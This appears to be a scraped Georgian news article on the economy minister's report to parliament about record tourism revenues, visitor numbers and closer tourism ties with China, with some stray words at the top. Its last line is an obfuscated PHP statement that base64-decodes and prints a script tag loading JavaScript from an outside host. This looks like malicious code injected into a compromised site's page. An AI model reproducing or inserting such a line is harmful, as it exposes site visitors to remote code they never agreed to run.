celsiusi
ავერსი შნაიდერი

 ვიცე-პრემიერის, ეკონომიკის მინისტრის, ლევან დავითაშვილის ინფორმაციით, მთელი ქვეყნის მასშტაბით, აქტიურად მიმდინარეობს ტურისტული ინფრასტრუქტურის, ბალნეოლოგიური კურორტების, საბაგიროების, კონკურენტული სერვისებისა და ახალი, მიმზიდველი მიმართულებების განვითარება. ამ საკითხებზე ვიცე-პრემიერმა საქართველოს პარლამენტში, „მინისტრის საათის“ ფორმატში გამოსვლის დროს მოხსენებაში ისაუბრა.

ეკონომიკის მინისტრმა ხაზი გაუსვა ტურიზმიდან შემოსავლების რეკორდულ ზრდას და, ზოგადად, ტურიზმის აღდგენის დინამიკას, რაც პანდემიის შემდეგ ფიქსირდება ჩვენს ქვეყანაში. მისი თქმით, გასულ წელს მოგზაურობიდან მიღებულმა შემოსავლებმა 2019 წლის, ანუ პანდემიამდელ დონეს 7.6%-ით გადააჭარბა და 3.5 მილიარდი აშშ დოლარი შეადგინა. 2021 წელთან შედარებით კი ზრდამ 182.5% შეადგინა. ჯამურად, ჩვენს ქვეყანაში 2022 წელს 5.5 მილიონი საერთაშორისო მოგზაურის ვიზიტი განხორციელდა.

„უნდა აღინიშნოს, რომ 2023 წლის ორ კვარტალში მოგზაურობიდან მიღებულმა შემოსავალმა 1.8 მილიარდი აშშ დოლარი შეადგინა, რაც რეკორდული მაჩვენებელია და ზრდა პანდემიამდელ ანუ 2019 წლის ანალოგიურ მაჩვენებელთან შედარებით 24%-ს შეადგენს. მიმდინარე წლის პირველი ორი კვარტლის მდგომარეობით, ქვეყანამ 2.9 მილიონ საერთაშორისო მოგზაურს უმასპინძლა, რაც 2019 წლის მონაცემების 74%-იანი აღდგენაა. მოლოდინი გვაქვს, რომ წლის ბოლომდე ჩვენი ქვეყანა საერთაშორისო ტურიზმიდან 4.4 მილიარდ აშშ დოლარის შემოსავალს მიიღებს“, – აღნიშნა ლევან დავითაშვილმა.

მინისტრის ინფორმაციით, წლევანდელი მონაცემები ქმნის საფუძვლიან მოლოდინს, რომ წლის ბოლომდე საქართველომ 6.6 მილიონ საერთაშორისო მოგზაურს უმასპინძლოს, რაც 2019 წლის მონაცემების 70.1% აღდგენაა.

„ტურისტული ბაზრის დივერსიფიკაციის მიზნით ერთ-ერთი აღსანიშნი ფაქტორია ჩინეთის სახალხო რესპუბლიკასთან თანამშრომლობის გაღრმავება, რადგან ის მსოფლიოში ყველაზე დიდი ტურისტული ბაზარია – ყოველწლიურად ჩინეთიდან სხვადასხვა ქვეყანას 150 მილიონზე მეტი ტურისტი სტუმრობს და მათი დანახარჯები დაახლოებით 300 მლრდ დოლარამდეა. ჩინეთთან უვიზო რეჟიმი დამატებითი სტიმულია ჩინეთის ტურისტული კომპანიებისთვის, რათა საქართველო განიხილონ, როგორც ტურისტული დანიშნულების ადგილი. ამასთან, აქტიურად ვიმუშავეთ ჩინეთთან უფრო მეტი პირდაპირი ავიარეისების საკითხზე“, – განაცხადა ლევან დავითაშვილმა.

538
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");